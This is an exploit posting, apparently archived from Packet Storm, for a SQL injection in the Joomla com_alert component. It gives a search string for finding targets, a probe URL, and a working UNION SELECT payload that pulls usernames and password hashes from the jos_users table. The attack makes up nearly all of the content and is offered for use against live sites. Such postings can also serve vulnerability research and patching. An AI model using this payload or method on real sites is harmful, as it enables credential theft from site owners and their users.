Joomla Alert SQL Injection

2010-03-17T00:00:00
ID PACKETSTORM:87386
Type packetstorm
Reporter N2n-Hacker
Modified 2010-03-17T00:00:00

Description

                                        
                                            `  
  
# Title: Joomla Component com_alert&q_item SQL Injection Vulnerability  
# Author: N2n-Hacker  
# Date: 2010-03-17  
# Script: Joomla  
#########################################################################  
#############################################################################################  
  
**[ Joomla com_alert&q_item Sql Injection Vulnerability ]**  
  
N2n-Hacker ----- 2nd@live.fr<mailto:2nd@live.fr>  
  
  
#############################################################################################  
#############################################################################################  
  
  
# Searching = "?option=com_alert"  
  
  
==> http://www.site.com/Joomla/index.php?option=com_alert&task=item&q_item=1' <== Inject Here Man =)  
  
  
  
==> Exploiting = http://www.site.com/Joomla/index.php?option=com_alert&task=item&q_item=-1 union select 1,  
concat(username,0x3e,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--  
  
  
#############################################################################################  
\\\\\\\\\ el zvit o rvit el douzan o ma rah dayer /////////  
  
#############################################################################################  
el bitton o ma dar fiya  
#############################################################################################  
  
  
  
  
`